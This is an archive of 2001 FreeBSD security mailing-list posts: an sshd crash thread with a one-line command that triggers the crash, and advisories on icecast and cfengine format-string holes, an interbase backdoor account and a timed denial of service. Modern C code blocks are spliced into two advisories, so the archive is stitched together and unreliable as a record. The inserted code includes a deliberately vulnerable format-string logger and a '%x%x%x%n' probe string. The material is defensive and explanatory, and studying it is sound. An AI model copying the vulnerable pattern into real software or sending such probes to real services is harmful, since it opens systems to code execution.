src/crypto/openssh/mpaux.c,v 1.2.2.2 2000/10/28 23:00:48 kris Exp $ $OpenBSD: hostfile.c,v 1.20 2000/09/07 20:27:51 deraadt Exp $ $FreeBSD: src/crypto/openssh/hostfile.c,v 1.1.1.1.2.2 2000/10/28 23:00:48 kris Exp $ $OpenBSD: authfile.c,v 1.20 2000/10/11 20:27:23 markus Exp $ $FreeBSD: src/crypto/openssh/authfile.c,v 1.2.2.3 2001/01/12 04:25:55 green Exp $ $OpenBSD: cli.c,v 1.2 2000/10/16 09:38:44 djm Exp $ $OpenBSD: match.c,v 1.9 2000/09/07 20:27:52 deraadt Exp $ $OpenBSD: dsa.c,v 1.11 2000/09/07 20:27:51 deraadt Exp $ $OpenBSD: xmalloc.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $ $OpenBSD: packet.c,v 1.38 2000/10/12 14:21:12 markus Exp $ $OpenBSD: hmac.c,v 1.4 2000/09/07 20:27:51 deraadt Exp $ $OpenBSD: crc32.c,v 1.7 2000/09/07 20:27:51 deraadt Exp $ $OpenBSD: compress.c,v 1.9 2000/09/07 20:27:50 deraadt Exp $ $OpenBSD: cipher.c,v 1.37 2000/10/23 19:31:54 markus Exp $ $FreeBSD: src/crypto/openssh/cipher.c,v 1.2.2.3 2001/01/12 04:25:56 green Exp $ $OpenBSD: nchan.c,v 1.19 2000/09/07 20:27:52 deraadt Exp $ $OpenBSD: channels.c,v 1.72 2000/10/27 07:48:22 markus Exp $ $OpenBSD: canohost.c,v 1.16 2000/10/21 17:04:22 markus Exp $ $FreeBSD: src/crypto/openssh/canohost.c,v 1.1.1.1.2.4 2001/01/12 04:25:56 green Exp $ $OpenBSD: authfd.c,v 1.29 2000/10/09 21:51:00 markus Exp $ $FreeBSD: src/crypto/openssh/authfd.c,v 1.2.2.4 2001/01/12 04:25:55 green Exp $ $OpenBSD: util.c,v 1.6 2000/10/27 07:32:19 markus Exp $ $OpenBSD: key.c,v 1.11 2000/09/07 20:27:51 deraadt Exp $ $FreeBSD: src/crypto/openssh/key.c,v 1.4.2.2 2000/10/28 23:00:48 kris Exp $ $OpenBSD: atomicio.c,v 1.7 2000/10/18 18:04:02 markus Exp $ $OpenBSD: uidswap.c,v 1.9 2000/09/07 20:27:55 deraadt Exp $ $FreeBSD: src/crypto/openssh/compat.c,v 1.1.1.1.2.3 2001/01/12 04:25:56 green Exp $ $OpenBSD: compat.c,v 1.27 2000/10/31 09:31:58 markus Exp $ $OpenBSD: bufaux.c,v 1.13 2000/09/07 20:27:50 deraadt Exp $ $FreeBSD: src/crypto/openssh/bufaux.c,v 1.2.2.2 2000/10/28 23:00:47 kris Exp $ $OpenBSD: uuencode.c,v 1.7 2000/09/07 
20:27:55 deraadt Exp $ $OpenBSD: buffer.c,v 1.8 2000/09/07 20:27:50 deraadt Exp $ $OpenBSD: log.c,v 1.11 2000/09/30 16:27:43 markus Exp $

/var/log/all.log has this on the incident:

Mar 12 16:40:01 ns sshd[76406]: input_userauth_request: illegal user hodo
Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped)
Mar 12 16:40:03 ns /kernel:
Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped)

From the output of "strings /sshd.core" I can see the server was doing some pretty normal activity, like rejecting a user I know, that had an account on another machine, but not this one.

If there is more information needed, I will try to provide it.

Thank you for listening and not panicking.

------------+------------------------------------------
Alex Popa,  | "Artificial Intelligence is
razor@ldc.ro| no match for Natural Stupidity"
------------+------------------------------------------
"It took the computing power of three C-64s to fly to the Moon. It takes a 486 to run Windows 95. Something is wrong here."

From owner-freebsd-security Mon Mar 12 14:58:13 2001
Delivered-To: freebsd-security@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id 2234C37B718 for ; Mon, 12 Mar 2001 14:58:09 -0800 (PST) (envelope-from brdavis@odin.ac.hmc.edu) Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id f2CMvsO01383; Mon, 12 Mar 2001 14:57:54 -0800
Date: Mon, 12 Mar 2001 14:57:54 -0800
From: Brooks Davis
To: Alex Popa
Cc: security@freebsd.org
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010312145754.A489@Odin.AC.HMC.Edu> References: <20010313004813.A78221@ldc.ro> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20010313004813.A78221@ldc.ro>; from razor@ldc.ro on Tue, Mar 13, 2001 at 12:48:13AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

--DocE+STaALJfprDB
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote:
> I am not really sure what this means (could mean a lot of things,
> including bad memory on my machine), but here are the facts:

This reminds me of something I noticed during the last discussion of ssh I got involved in and completely forgot about. If you create an account with a bad shell (say, /bin/false) and run the following command you get an immediate sshd core dump:

ssh -t xxx@localhost /bin/sh

Attempting to run gdb on the core appears to show that I'm in:

#0  0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3

but the binary is stripped so I don't know and my /usr/obj is out of sync with my world at the moment so I figure running gdb against the unstripped binary is not productive.

-- Brooks

--
Any statement of the form "X is the one, true Y" is FALSE.
PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4

--DocE+STaALJfprDB
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE6rVRxXY6L6fI4GtQRAg+kAJ4vCmuI9LwU1SYhc+P4giz+WKJhQQCguZSX
NyC1bmupNaEBEMJH1y4nmB8=
=akX/
-----END PGP SIGNATURE-----

--DocE+STaALJfprDB--

From owner-freebsd-security Mon Mar 12 15: 2: 9 2001
Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 780A437B719; Mon, 12 Mar 2001 15:02:03 -0800 (PST) (envelope-from mike@sentex.net) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.2/8.11.2) with ESMTP id f2CN1Yg55899; Mon, 12 Mar 2001 18:01:40 -0500 (EST) (envelope-from mike@sentex.net)
Message-Id: <4.2.2.20010312180009.02c135a8@marble.sentex.net>
X-Sender: mdtancsa@marble.sentex.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
Date: Mon, 12 Mar 2001 18:01:33 -0500
To: Alex Popa , freebsd-security@FreeBSD.ORG
From: Mike Tancsa
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Cc: freebsd-stable@FreeBSD.ORG
In-Reply-To: <20010313004813.A78221@ldc.ro>
Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

At 12:48 AM 3/13/2001 +0200, Alex Popa wrote:
>I am not really sure what this means (could mean a lot of things,
>including bad memory on my machine), but here are the facts:
>
>The system was cvsupped and compiled on March 10th.

There is an open PR about this.

http://www.freebsd.org/cgi/query-pr.cgi?pr=25722

I wonder if it's exploitable?
---Mike

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Network Administration, mike@sentex.net
Sentex Communications www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

From owner-freebsd-security Mon Mar 12 15:22:20 2001
Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-59.dsl.lsan03.pacbell.net [63.207.60.59]) by hub.freebsd.org (Postfix) with ESMTP id 520E037B71A for ; Mon, 12 Mar 2001 15:22:16 -0800 (PST) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0A29266B6C; Mon, 12 Mar 2001 15:22:15 -0800 (PST)
Date: Mon, 12 Mar 2001 15:22:15 -0800
From: Kris Kennaway
To: Brooks Davis
Cc: Alex Popa , security@FreeBSD.ORG
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010312152215.A94640@mollari.cthul.hu>
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu>
Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Nq2Wo0NMKNjxTN9z" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010312145754.A489@Odin.AC.HMC.Edu>; from brooks@one-eyed-alien.net on Mon, Mar 12, 2001 at 02:57:54PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

--Nq2Wo0NMKNjxTN9z
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Mon, Mar 12, 2001 at 02:57:54PM -0800, Brooks Davis wrote:
> On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote:
> > I am not really sure what this means (could mean a lot of things,
> > including bad memory on my machine), but here are the facts:
>
> This reminds me of something I noticed during the last discussion of
> ssh I got involved in and completely forgot about. If you create an
> account with a bad shell (say, /bin/false) and run the following command
> you get an immediate sshd core dump:
>
> ssh -t xxx@localhost /bin/sh
>
> Attempting to run gdb on the core appears to show that I'm in:
>
> #0  0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3
>
> but the binary is stripped so I don't know and my /usr/obj is out of
> sync with my world at the moment so I figure running gdb against the
> unstripped binary is not productive.

There's a PR open about this and Brian is looking into it - indications are it's a simple bug and not a security problem, denial of service or otherwise.

Kris

--Nq2Wo0NMKNjxTN9z
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6rVonWry0BWjoQKURAgsqAJ9O7Nv5bFkBfhRjEo8OgB34JWgFGwCfULJ8
i6pGoR04IEwGi8EtywY58XU=
=7bZh
-----END PGP SIGNATURE-----

--Nq2Wo0NMKNjxTN9z--

From owner-freebsd-security Mon Mar 12 15:31:48 2001
Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A965B37B71A; Mon, 12 Mar 2001 15:31:37 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNVb526130; Mon, 12 Mar 2001 15:31:37 -0800 (PST) (envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:31:37 -0800 (PST)
Message-Id: <200103122331.f2CNVb526130@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:23.icecast
Reply-To: security-advisories@FreeBSD.org
Sender:
owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:23                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          icecast port contains remote vulnerability

Category:       ports
Module:         icecast
Announced:      2001-03-12
Credits:        |CyRaX|
Affects:        Ports collection prior to the correction date.
Corrected:      2001-03-10
Vendor status:  Unresponsive
FreeBSD only:   NO

I.   Background

icecast is a server for streaming MP3 audio.

II.  Problem Description

The icecast software, versions prior to 1.3.7_1, contains multiple format string vulnerabilities, which allow a remote attacker to execute arbitrary code as the user running icecast, usually the root user. There are a number of other potential abuses of format strings which may or may not pose security risks, but have not currently been audited.

The icecast port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains nearly 4700 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports.

III. Impact

Arbitrary remote users can execute arbitrary code on the local system as the user running icecast, usually the root user.

If you have not chosen to install the icecast port/package, then your system is not vulnerable to this problem.

IV.  Workaround

Deinstall the icecast port/package, if you have installed it.

V.   Solution

Consider running the icecast software as a non-privileged user to minimize the impact of further security vulnerabilities in this software.
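The bug class this advisory names (and SA-01:27 below names for cfengine) in miniature, as an added example that is not icecast, cfengine or FreeBSD code: a printf-style logger called once with client text as the format string and once with a literal format, plus a helper that counts conversion specifiers in untrusted input so a protocol handler or log monitor can flag such probes. The logger name log_printf, the logbuf buffer and the sample client message are this example's own assumptions, not taken from either port.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not icecast/cfengine code.  log_printf() stands in for the
 * printf-style logging routine such daemons use; logbuf stands in for the
 * log line it builds (a hypothetical layout, kept so it can be inspected). */
static char logbuf[256];

static void log_printf(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(logbuf, sizeof logbuf, fmt, ap);
    va_end(ap);
}

/* VULNERABLE call site: text received from the network is passed as the
 * format string.  A client message of "%x%x%x" leaks stack words into the
 * log and "%n" writes to memory, which is how "arbitrary code as the user
 * running icecast" arises.  Only ever call this with plain text. */
const char *log_client_vulnerable(const char *client_msg)
{
    log_printf(client_msg);            /* BUG: the attacker controls fmt */
    return logbuf;
}

/* FIXED call site: the format is a literal and the untrusted text is an
 * argument, so '%' characters in it are copied verbatim, never interpreted. */
const char *log_client_fixed(const char *client_msg)
{
    log_printf("%s", client_msg);
    return logbuf;
}

/* Detection helper: number of conversion specifiers (a '%' not escaped as
 * "%%") in a string.  Any non-zero count in data that will reach a format
 * function is worth rejecting, or alerting on, at the protocol boundary. */
int count_conversions(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {             /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    /* Constructed sample: the kind of request a hostile client would send. */
    const char *probe = "GET /stream %x%x%x%n HTTP/1.0";
    printf("conversions in probe: %d\n", count_conversions(probe));
    printf("fixed logger output : %s\n", log_client_fixed(probe));
    return 0;
}
```

Declaring log_printf with __attribute__((format(printf, 1, 2))) and compiling with gcc -Wformat -Wformat-security turns the vulnerable call site into a compile-time warning; that is the cheapest way to audit the "other potential abuses of format strings" the advisory says remain unexamined.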
To upgrade icecast, choose one of the following options:

1) Upgrade your entire ports collection and rebuild the icecast port.

2) Deinstall the old package and install a new package dated after the correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/icecast-1.3.7_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/icecast-1.3.7_1.tgz

NOTE: It may be several days before updated packages are available

[alpha]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/icecast-1.3.7_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/icecast-1.3.7_1.tgz

3) download a new port skeleton for the icecast port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOq1b9lUuHi5z0oilAQF0VQQAgjsvLSPtZ1pu6OtkGxuMJhCmmeCvFJvL
4szsF1csrFrXhaH7z1VjJP8r/Q2NBzWcS3qujkhGRObsGGyvAJKk7QVrqnjXV3gD
rgLnphjNlKt0VuXafxXwTT8YTxoCbzOHy23aa0KaRWoCAVcVi4AAZs4XHEUgU+Ov
lWOyEgxUBEk=
=WM3Y
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Mar 12 15:35:11 2001
Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id
A503837B718; Mon, 12 Mar 2001 15:34:53 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNYrJ26352; Mon, 12 Mar 2001 15:34:53 -0800 (PST) (envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:34:53 -0800 (PST)
Message-Id: <200103122334.f2CNYrJ26352@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:26.interbase
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:26                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          interbase contains remote backdoor

Category:       ports
Module:         interbase
Announced:      2001-03-12
Credits:        Firebird project
Affects:        Ports collection prior to the correction date.
Corrected:      See below.
Vendor status:  No update released
FreeBSD only:   NO

I.   Background

Interbase is a SQL database server from Borland.

II.  Problem Description

The interbase software contains a remote backdoor account, which was apparently introduced by the vendor in 1992. The interbase source code has recently been released and is the basis for a derivative project called firebird, who are credited with discovering the vulnerability.

The backdoor account has full read and write access to databases stored on the server, and also gives the ability to write to arbitrary files on the server as the user running the interbase server (usually user root). Remote attackers may connect to the database on TCP port 3050.
The interbase port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains nearly 4700 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports.

III. Impact

Remote users who can connect to the interbase database server can obtain full access to all databases using a backdoor account built into the server itself. This account cannot be disabled.

If you have not chosen to install the interbase port/package, then your system is not vulnerable to this problem.

IV.  Workaround

1) Deinstall the interbase port/package, if you have installed it.

2) Use packet filters on your perimeter firewalls, or ipfw(8)/ipf(8) on the interbase server to prevent connections from untrusted systems to TCP port 3050 on the interbase server. Note that local users, or arbitrary users on systems permitted to connect to the TCP port can still access the backdoor account.

3) Migrate to the firebird database, which is an open-source derivative of the interbase software which does not contain the backdoor account.

V.   Solution

The FreeBSD port of interbase is not provided by Borland -- it is provided in binary form from Rios Corporation -- and there does not appear to be a patch available for the security vulnerability. Therefore there is currently no complete solution to this security vulnerability; see the previous section for possible workarounds.
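A check for workaround (2), as an added example that is not from the advisory or the interbase port: a non-blocking TCP connect with a timeout, run from a host that the packet filter is supposed to exclude, tells you whether the interbase listener on 3050/tcp is still reachable from that vantage point. A completed handshake means the backdoor account is reachable from there; a refusal or a timeout means the filter (or deinstallation) is in effect. Only the port number comes from the advisory; the function names and the loopback test listener are this example's own. The same check cannot verify a UDP filter such as the one for timed in SA-01:28 below, because UDP has no handshake to observe.

```c
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* From the advisory: the interbase server accepts connections on 3050/tcp. */
#define INTERBASE_PORT 3050

/* Returns 1 if a TCP handshake to ip:port completes within timeout_ms,
 * 0 if the connection is refused or times out (no listener, or a packet
 * filter in the way), -1 on a local error such as an unparsable address. */
int tcp_port_reachable(const char *ip, unsigned short port, int timeout_ms)
{
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1)
        return -1;

    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    /* Non-blocking connect so a silently dropped SYN cannot hang the check. */
    fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK);

    int reachable = 0;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) == 0) {
        reachable = 1;                         /* completed immediately */
    } else if (errno == EINPROGRESS) {
        struct pollfd pfd = { .fd = fd, .events = POLLOUT, .revents = 0 };
        if (poll(&pfd, 1, timeout_ms) == 1) {
            int err = 0;
            socklen_t len = sizeof err;
            /* SO_ERROR separates a finished handshake from ECONNREFUSED. */
            if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &err, &len) == 0 && err == 0)
                reachable = 1;
        }
    }
    close(fd);
    return reachable;
}

/* Test fixture (example's own): listen on 127.0.0.1 at a kernel-chosen port
 * so the check can be exercised without a real interbase server.  Stores
 * the port and returns the listening fd, or -1 on failure. */
int start_local_listener(unsigned short *port_out)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = 0;
    socklen_t len = sizeof sa;
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 1) < 0 ||
        getsockname(fd, (struct sockaddr *)&sa, &len) < 0) {
        close(fd);
        return -1;
    }
    *port_out = ntohs(sa.sin_port);
    return fd;
}

/* Self-check: a live listener must read as reachable, and the same port
 * must read as unreachable once the listener is gone.  Returns 1 if both
 * hold; run it before trusting a "filtered" verdict against a real host. */
int selftest(void)
{
    unsigned short port;
    int lfd = start_local_listener(&port);
    if (lfd < 0)
        return 0;
    int before = tcp_port_reachable("127.0.0.1", port, 1000);
    close(lfd);
    int after = tcp_port_reachable("127.0.0.1", port, 1000);
    return before == 1 && after == 0;
}

int main(int argc, char **argv)
{
    const char *ip = argc > 1 ? argv[1] : "127.0.0.1";
    int r = tcp_port_reachable(ip, INTERBASE_PORT, 2000);
    printf("%s:%d %s\n", ip, INTERBASE_PORT,
           r == 1 ? "REACHABLE: backdoor account exposed from here"
                  : r == 0 ? "filtered or closed" : "check failed");
    return r == 1;
}
```

Run it from a host outside the trusted set after installing the ipfw/ipf rules; a "filtered or closed" result from the trusted hosts themselves is expected to be "REACHABLE", which is the residual exposure the advisory's note about permitted systems refers to.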
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOq1c21UuHi5z0oilAQEfhgP/aoWhV5eBmmKkYcpVxRhu+FkkOYJvIwih
RIsCmTKISP5f0smt37Qw4B0o5F2EmAUVncYFNGK39Co+Pxr9eyRx0PD4HvX8JnZ3
7QtqRE4Oh2LwX0xpd9tpUpT1yxdGX9u+TSB+9MdB5hIyEsnRjwuMwZn1vUOBB8uk
whVMpvQLc/w=
=C9Nl
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Mar 12 15:38: 8 2001
Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A92F337B71A; Mon, 12 Mar 2001 15:37:52 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNbqc26863; Mon, 12 Mar 2001 15:37:52 -0800 (PST) (envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:37:52 -0800 (PST)
Message-Id: <200103122337.f2CNbqc26863@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:27.cfengine
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:27                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          cfengine port contains remote root vulnerability

Category:       ports
Module:         cfengine
Announced:      2001-03-12
Credits:        Pekka Savola
Affects:        Ports collection prior to the correction date.
Corrected:      2001-01-21
Vendor status:  Updated version released
FreeBSD only:   NO

I.   Background

cfengine is a system for automating the configuration and maintenance of large networks.

II.  Problem Description

The cfengine port, versions prior to 1.6.1, contained several format string vulnerabilities which allow a remote attacker to execute arbitrary code on the local system as the user running cfengine, usually user root.

The cfengine port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains nearly 4700 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports.

III. Impact

Arbitrary remote users can execute code on the local system as the user running cfengine, usually user root.

If you have not chosen to install the cfengine port/package, then your system is not vulnerable to this problem.

IV.  Workaround

One of the following:

1) Deinstall the cfengine port/package, if you have installed it.

2) Implement access controls on connections to the cfengine server, either at the application level using the cfengine configuration file, or by using network-level packet filtering on the local system using ipfw(8)/ipf(8), or on the perimeter firewalls.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the cfengine port.

2) Deinstall the old package and install a new package dated after the correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/sysutils/cfengine-1.6.3.tar.gz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/sysutils/cfengine-1.6.3.tar.gz

[alpha]
Packages are not automatically generated for the alpha architecture at this time due to lack of build resources.

3) download a new port skeleton for the cfengine port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.
4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOq1dclUuHi5z0oilAQFhhAQApfRMj88GYMKiTtLeyjWeaDLFIlDjUTl4
fF1QQNzetOSIoVjA+CsbkTgsX/c8B6Lc7BuTI7K3BLKUu2QC2GbYkn5/ymCdYQeE
dW2S00bMdBP6GwURAdFnizezkZq5Y3oEVYXVL4s91M9jb3wCwNOwnbfKH/aegFvL
ZOjDvMUdjb0=
=yzjS
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Mar 12 15:44:14 2001
Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DE4F637B719; Mon, 12 Mar 2001 15:44:00 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNi0R27619; Mon, 12 Mar 2001 15:44:00 -0800 (PST) (envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:44:00 -0800 (PST)
Message-Id: <200103122344.f2CNi0R27619@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-01:28.timed
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
============================================================================= FreeBSD-SA-01:28 Security Advisory FreeBSD, Inc. Topic: timed allows remote denial of service Category: core Module: timed Announced: 2001-03-12 Credits: Discovered during internal source code auditing Affects: All released versions of FreeBSD 3.x, 4.x. FreeBSD 3.5-STABLE prior to the correction date. FreeBSD 4.2-STABLE prior to the correction date. Corrected: 2001-03-10 (FreeBSD 3.5-STABLE) 2001-01-07 (FreeBSD 4.2-STABLE) FreeBSD only: NO I. Background timed(8) is a server for the Time Synchronisation Protocol, for synchronising the system clocks of multiple clients. II. Problem Description Malformed packets sent to the timed daemon could cause it to crash, thereby denying service to clients if timed is not run under a watchdog process which causes it to automatically restart in the event of a failure. The timed daemon is not run in this way in the default invocation from /etc/rc.conf using the timed_enable variable. The timed daemon is not enabled by default, and its use is not recommended (FreeBSD includes ntpd(8), the network time protocol daemon, which provides superior functionality). All versions of FreeBSD 3.x and 4.x prior to the correction date including 3.5.1-RELEASE and 4.2-RELEASE are vulnerable 